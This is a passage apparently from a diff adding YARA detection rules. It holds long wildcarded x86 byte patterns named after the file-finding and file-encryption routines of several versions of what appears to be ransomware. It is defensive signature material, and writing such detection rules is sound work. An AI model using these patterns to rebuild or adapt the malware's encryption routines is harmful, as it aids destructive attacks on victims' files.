?? ?? 8B 90 ?? ?? ?? ?? FF D2 8B 45 + ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 0F B7 54 41 ?? 83 FA ?? 74 16 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? + ?? ?? ?? FF D1 68 ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? + 89 45 ?? 83 7D ?? ?? 0F 84 ( A6 | A8 ) 01 00 00 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 89 45 ?? + 83 7D ?? ?? 0F 84 ( 78 | 7A ) 01 00 00 C7 45 ?? ?? ?? ?? ?? 8B 4D ?? 8B 11 83 E2 ?? 0F 85 94 00 00 00 C7 45 ?? ?? ?? ?? + ?? 8B 45 ?? 83 C0 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 78 8B 4D ?? 83 C1 ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 65 C7 + 45 ?? ?? ?? ?? ?? 8D 55 ?? 52 8B 45 ?? 83 C0 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 43 8B 55 ?? 8B 02 50 8B + } + $v30_2_find_file_2 = { + 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 75 1C 8B 55 ?? 83 C2 ?? 89 55 ?? 8B 45 ?? 8B 48 ?? 51 8B 55 ?? 52 + E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? EB 67 8B 4D ?? 83 C1 ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 + 54 C7 45 ?? ?? ?? ?? ?? 8D 55 ?? 52 8B 45 ?? 83 C0 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 32 8B 55 ?? 52 E8 + ?? ?? ?? ?? 83 C4 ?? 85 C0 75 16 8B 45 ?? 50 8B 4D ?? 51 E8 3C FE FF FF 83 C4 ?? 03 45 ?? 89 45 ?? 8B 55 ?? 52 E8 ?? ?? + ?? ?? 83 C4 ?? 8B 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 85 C0 0F 85 DA FE FF FF 8B 45 ?? 50 E8 ?? + ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 83 7D ?? ?? 74 ( 2E | 30 ) 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 50 8B 45 ?? 50 E8 ?? ?? + ?? ?? 83 C4 ?? 3D ?? ?? ?? ?? 74 ( 0E | 10 ) 6A ?? [0-2] 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 89 55 ?? 8B 45 ?? + 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 8B E5 5D C3 + } + $v30_3_find_file_1 = { + 55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 74 06 83 7D ?? ?? 75 08 8B 45 ?? E9 7C 02 00 00 E8 ?? ?? ?? ?? 89 45 + ?? 83 7D ?? ?? 0F 84 67 02 00 00 8B 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 8B 45 ?? 50 E8 ?? ?? ?? + ?? 83 C4 ?? 8B 4D ?? 0F B7 54 41 ?? 83 FA ?? 74 16 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 68 + ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? + ?? 0F 84 E7 01 00 00 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 89 45 ?? 83 7D ?? ?? 0F 84 B9 01 00 + 00 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 4D ?? 83 C1 ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 91 00 00 00 8D 55 + ?? 52 8B 45 ?? 83 C0 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 7A 8B 4D ?? 8B 11 83 E2 ?? 75 70 C7 45 ?? ?? ?? ?? ?? 8D 45 + ?? 50 8B 4D ?? 83 C1 ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 49 8B 45 ?? 8B 48 ?? 51 8B 55 ?? 52 8B 45 ?? 8B + } + $v30_3_find_file_2 = { + 08 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 1C 8B 45 ?? 83 C0 ?? 89 45 ?? 8B 4D ?? 8B 51 ?? 52 8B 45 ?? 50 E8 ?? + ?? ?? ?? 83 C4 ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? E9 88 00 00 00 8B 55 ?? 8B 02 83 E0 ?? 74 7E 8B 4D ?? 83 79 ?? ?? + 74 75 8B 55 ?? 83 C2 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 62 C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 50 8B 4D ?? 83 C1 ?? 51 8B + 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 40 8B 45 ?? 50 8B 4D ?? 8B 51 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 1D 8B 45 + ?? 50 8B 4D ?? 51 E8 15 FE FF FF 83 C4 ?? 85 C0 74 09 8B 55 ?? 83 C2 ?? 89 55 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B + 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 85 C0 0F 85 AC FE FF FF 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? + ?? ?? ?? FF D2 8B 45 ?? 50 8B 4D ?? 8B 51 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 74 2E 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 + C4 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 3D ?? ?? ?? ?? 74 0E 6A ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 89 + 45 ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 8B E5 5D C3 + } + $v20_1_encrypt_file_1 = { + 55 8B EC 81 EC ?? ?? ?? ?? 56 C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 74 06 83 7D ?? ?? 75 08 8B 45 ?? E9 99 05 00 00 8B 45 ?? + 83 38 ?? 74 1B 8B 4D ?? 83 79 ?? ?? 74 12 8B 55 ?? 83 7A ?? ?? 74 09 8B 45 ?? 83 78 ?? ?? 75 08 8B 45 ?? E9 6E 05 00 00 + 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 89 45 ?? 6A ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 C7 + 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? + ?? ?? ?? FF D0 89 45 ?? 83 7D ?? ?? 0F 84 F4 04 00 00 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 8B + 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 85 C0 74 07 C7 45 ?? ?? ?? ?? ?? 66 0F 57 C0 66 0F 13 45 ?? 8D 45 ?? 50 + 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 E7 03 00 00 66 0F 57 C0 66 0F 13 85 ?? ?? ?? ?? 6A ?? 6A ?? + 8B 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 83 F8 ?? 0F 84 AF 03 00 00 + 8D 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 97 03 00 00 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B + 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 89 45 ?? 83 7D ?? ?? 0F 84 6A 03 00 00 C7 45 ?? ?? ?? ?? ?? 8D 55 ?? 52 + E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 2C 03 00 00 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? + ?? ?? ?? ?? 8D 45 ?? 50 8D 4D ?? 51 8D 55 ?? 52 8D 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 D9 02 00 00 + } + $v20_1_encrypt_file_2 = { + C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 55 ?? 52 8D 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 8B 45 ?? 8B 48 ?? 51 8B 55 ?? + 8B 02 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 81 02 00 00 C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 4D ?? 51 8B 55 ?? 8B 42 ?? 50 8B + 4D ?? 8B 51 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 85 C0 0F 84 41 02 00 00 8B 55 ?? 8B 45 ?? 3B 42 ?? + 0F 85 32 02 00 00 6A ?? 8D 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 85 C0 0F + 84 0B 02 00 00 8B 45 ?? 3B 45 ?? 0F 85 FF 01 00 00 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 C7 45 ?? ?? ?? ?? + ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 0F 84 CE 01 00 00 66 0F 57 C0 66 0F 13 45 ?? C7 45 ?? ?? ?? + ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 4D ?? 3B 4D ?? 75 0C 8B 55 ?? 3B 55 ?? 0F 84 73 01 00 00 C7 45 ?? ?? + ?? ?? ?? 8B 45 ?? 33 C9 8B 55 ?? 2B 55 ?? 8B 75 ?? 1B 75 ?? 89 85 ?? ?? ?? ?? 89 4D ?? 89 55 ?? 89 75 ?? 8B 45 ?? 3B 45 + ?? 77 1A 72 0B 8B 8D ?? ?? ?? ?? 3B 4D ?? 73 0D 8B 55 ?? 33 C0 89 55 ?? 89 45 ?? EB 12 8B 4D ?? 2B 4D ?? 8B 55 ?? 1B 55 + ?? 89 4D ?? 89 55 ?? 8B 45 ?? 89 45 ?? 8B 4D ?? 33 D2 03 4D ?? 13 55 ?? 89 8D ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8B 85 ?? ?? + ?? ?? 3B 45 ?? 75 12 8B 8D ?? ?? ?? ?? 3B 4D ?? 75 07 C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B + } + $v20_1_encrypt_file_3 = { + 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 85 C0 0F 84 A2 00 00 00 8B 4D ?? 3B 4D ?? 0F 85 96 00 00 00 C7 45 ?? ?? + ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 55 ?? 52 8D 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 E8 ?? + ?? ?? ?? 83 C4 ?? 85 C0 74 60 6A ?? 8D 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF + D1 85 C0 74 31 8B 55 ?? 3B 55 ?? 75 29 8B 45 ?? 33 C9 03 45 ?? 13 4D ?? 89 45 ?? 89 4D ?? C7 45 ?? ?? ?? ?? ?? 8B 55 ?? + 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 75 02 EB 0D 83 7D ?? ?? 74 02 + EB 05 E9 79 FE FF FF 83 7D ?? ?? 74 17 8B 55 ?? 3B 55 ?? 75 0F 8B 45 ?? 3B 45 ?? 75 07 C7 45 ?? ?? ?? ?? ?? 8B 4D ?? 51 + E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 51 E8 ?? ?? ?? + ?? 8B 90 ?? ?? ?? ?? FF D2 6A ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? + ?? ?? ?? FF D0 83 7D ?? ?? 74 0C 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 + 83 7D ?? ?? 75 22 6A ?? 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 85 C0 75 07 C7 45 ?? ?? ?? ?? ?? + 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 74 60 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? + 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 89 45 ?? 83 7D ?? ?? 74 37 8D 95 ?? ?? ?? ?? 52 8D 85 + ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 + ?? ?? ?? ?? FF D2 8B 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 8B 45 ?? 5E 8B E5 5D C3 + } + $v30_1_encrypt_file_1 = { + 55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 74 06 83 7D ?? ?? 75 08 8B 45 ?? E9 02 05 00 00 8B 45 ?? 83 38 ?? 74 + 09 8B 4D ?? 83 79 ?? ?? 75 08 8B 45 ?? E9 E9 04 00 00 C7 45 ?? ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? + FF D0 89 45 ?? 6A ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B + 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 89 45 ?? 83 7D ?? ?? 0F 84 6F 04 00 00 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? + ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 8B 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 + C4 ?? 85 C0 0F 85 90 03 00 00 6A ?? 6A ?? 6A ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 83 F8 ?? 0F 84 70 03 + 00 00 6A ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 89 45 ?? 83 7D ?? ?? 0F 84 50 03 00 00 8D 55 ?? 52 8B 45 + ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 38 03 00 00 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 4D ?? 51 E8 ?? ?? + ?? ?? 8B 90 ?? ?? ?? ?? FF D2 89 45 ?? 83 7D ?? ?? 0F 84 04 03 00 00 6A ?? 6A ?? 8B 45 ?? 8B 48 ?? 51 8B 55 ?? 52 E8 ?? + ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 83 F8 ?? 0F 84 CC 02 00 00 8B 4D ?? 3B 4D ?? 73 08 8B 55 ?? 89 55 ?? EB 06 8B 45 ?? 89 + 45 ?? 8B 4D ?? 89 4D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 55 ?? 52 6A ?? 6A ?? 8B 45 ?? 8B 08 51 E8 ?? ?? ?? + ?? 8B 90 ?? ?? ?? ?? FF D2 85 C0 0F 84 73 01 00 00 8B 45 ?? 8B 48 ?? 83 E9 ?? 89 4D ?? 8B 55 ?? D1 E2 89 55 ?? 8B 45 ?? + } + $v30_1_encrypt_file_2 = { + 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 0F 84 35 01 00 00 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? + ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 4D ?? 2B 4D ?? 39 4D ?? 73 08 8B 55 ?? 89 55 ?? EB 09 8B 45 ?? 2B 45 ?? 89 45 ?? 8B 4D + ?? 89 4D ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? + FF D0 85 C0 0F 84 94 00 00 00 8B 4D ?? 3B 4D ?? 0F 85 88 00 00 00 8B 55 ?? 3B 55 ?? 73 07 C7 45 ?? ?? ?? ?? ?? 83 7D ?? + ?? 74 73 8B 45 ?? 89 45 ?? 8B 4D ?? 51 8D 55 ?? 52 8B 45 ?? 50 6A ?? 8B 4D ?? 51 6A ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 + ?? ?? ?? ?? FF D0 85 C0 74 44 6A ?? 8D 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF + D2 85 C0 74 21 8B 45 ?? 3B 45 ?? 75 19 8B 4D ?? 03 4D ?? 89 4D ?? 8B 55 ?? 03 55 ?? 89 55 ?? C7 45 ?? ?? ?? ?? ?? 83 7D + ?? ?? 74 06 83 7D ?? ?? 74 02 EB 0C 8B 45 ?? 3B 45 ?? 0F 85 FB FE FF FF 8B 4D ?? 3B 4D ?? 75 07 C7 45 ?? ?? ?? ?? ?? 8B + 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 83 7D ?? ?? 0F 85 02 01 00 00 C7 45 + ?? ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 83 F8 ?? 0F 84 DB 00 00 00 6A ?? 8D + 4D ?? 51 8B 55 ?? 8B 42 ?? 50 8B 4D ?? 8B 51 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 85 C0 0F 84 AE 00 + } + $v30_1_encrypt_file_3 = { + 00 00 8B 55 ?? 8B 45 ?? 3B 42 ?? 0F 85 9F 00 00 00 6A ?? 8D 4D ?? 51 6A ?? 8D 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 + ?? ?? ?? ?? FF D1 85 C0 74 7E 83 7D ?? ?? 75 78 8B 55 ?? 3B 55 ?? 74 1B 8B 45 ?? 8B 4D ?? 03 48 ?? 89 4D ?? 8B 55 ?? 2B + 55 ?? 89 55 ?? 8B 45 ?? 89 45 ?? 6A ?? 8D 4D ?? 51 6A ?? 8D 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 + 85 C0 74 34 83 7D ?? ?? 75 2E 6A ?? 8D 55 ?? 52 6A ?? 8D 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 85 + C0 74 0D 83 7D ?? ?? 75 07 C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 EB 07 C7 45 ?? ?? ?? + ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 83 7D ?? ?? 75 71 83 7D ?? ?? 75 28 83 7D ?? ?? 75 22 68 ?? ?? + ?? ?? 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 07 C7 45 ?? ?? ?? ?? ?? EB 43 83 7D ?? ?? 74 36 83 7D ?? + ?? 74 30 C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 + 74 07 C7 45 ?? ?? ?? ?? ?? EB 07 C7 45 ?? ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 + C4 ?? EB 07 C7 45 ?? ?? ?? ?? ?? 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 8B 45 ?? 8B E5 5D C3 + } + $v30_2_encrypt_file_1 = { + 55 8B EC 81 EC ?? ?? ?? ?? 56 C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 74 06 83 7D ?? ?? 75 08 8B 45 ?? E9 BF 05 00 00 8B 45 ?? + 83 38 ?? 74 1B 8B 4D ?? 83 79 ?? ?? 74 12 8B 55 ?? 83 7A ?? ?? 74 09 8B 45 ?? 83 78 ?? ?? 75 08 8B 45 ?? E9 94 05 00 00 + 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 89 45 ?? 6A ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 C7 + 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? + ?? ?? ?? FF D0 89 45 ?? 83 7D ?? ?? 0F 84 1A 05 00 00 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 8B + 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 85 C0 74 07 C7 45 ?? ?? ?? ?? ?? 66 0F 57 C0 66 0F 13 45 ?? 8D 45 ?? 50 + 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 0D 04 00 00 66 0F 57 C0 66 0F 13 85 ?? ?? ?? ?? 6A ?? 6A ?? + 8B 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 83 F8 ?? 0F 84 D5 03 00 00 + 8D 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 BD 03 00 00 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B + 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 89 45 ?? 83 7D ?? ?? 0F 84 90 03 00 00 C7 45 ?? ?? ?? ?? ?? 8D 55 ?? 52 + E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 52 03 00 00 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? + ?? ?? ?? ?? 8D 45 ?? 50 8D 4D ?? 51 8D 55 ?? 52 8D 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 FF 02 00 00 + } + $v30_2_encrypt_file_2 = { + C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 55 ?? 52 8D 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 8B 45 ?? 8B 48 ?? 51 8B 55 ?? + 8B 02 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 A7 02 00 00 C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 4D ?? 51 8B 55 ?? 8B 42 ?? 50 8B + 4D ?? 8B 51 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 85 C0 0F 84 67 02 00 00 8B 55 ?? 8B 45 ?? 3B 42 ?? + 0F 85 58 02 00 00 6A ?? 8D 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 85 C0 0F + 84 31 02 00 00 8B 45 ?? 3B 45 ?? 0F 85 25 02 00 00 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 C7 45 ?? ?? ?? ?? + ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 0F 84 F4 01 00 00 66 0F 57 C0 66 0F 13 45 ?? C7 45 ?? ?? ?? + ?? ?? 66 0F 57 C0 66 0F 13 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 4D ?? 3B 4D ?? 75 0C 8B 55 ?? 3B 55 ?? 0F + 84 90 01 00 00 C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 33 C9 8B 55 ?? 2B 55 ?? 8B 75 ?? 1B 75 ?? 89 85 ?? ?? ?? ?? 89 8D ?? ?? ?? + ?? 89 95 ?? ?? ?? ?? 89 75 ?? 8B 85 ?? ?? ?? ?? 3B 45 ?? 77 1D 72 0E 8B 8D ?? ?? ?? ?? 3B 8D ?? ?? ?? ?? 73 0D 8B 55 ?? + 33 C0 89 55 ?? 89 45 ?? EB 12 8B 4D ?? 2B 4D ?? 8B 55 ?? 1B 55 ?? 89 4D ?? 89 55 ?? 8B 45 ?? 89 45 ?? 8B 4D ?? 33 D2 03 + 4D ?? 13 55 ?? 89 8D ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 3B 45 ?? 75 12 8B 8D ?? ?? ?? ?? 3B 4D ?? 75 07 C7 + 45 ?? ?? ?? ?? ?? 6A ?? 8D 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 85 C0 0F + 84 B3 00 00 00 8B 4D ?? 3B 4D ?? 0F 85 A7 00 00 00 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 55 ?? 52 8D 45 ?? 50 8B + } + $v30_2_encrypt_file_3 = { + 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 71 6A ?? 8D 45 ?? 50 8B 4D ?? + 51 8B 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 85 C0 74 42 8B 55 ?? 3B 55 ?? 75 3A 8B 45 ?? 33 C9 03 + 45 ?? 13 4D ?? 89 45 ?? 89 4D ?? C7 45 ?? ?? ?? ?? ?? 8B 55 ?? 33 C0 03 55 ?? 13 45 ?? 89 55 ?? 89 45 ?? 8B 4D ?? 51 E8 + ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 75 02 EB 0D 83 7D ?? ?? 74 02 EB 05 + E9 5C FE FF FF 83 7D ?? ?? 74 17 8B 4D ?? 3B 4D ?? 75 0F 8B 55 ?? 3B 55 ?? 75 07 C7 45 ?? ?? ?? ?? ?? 8B 45 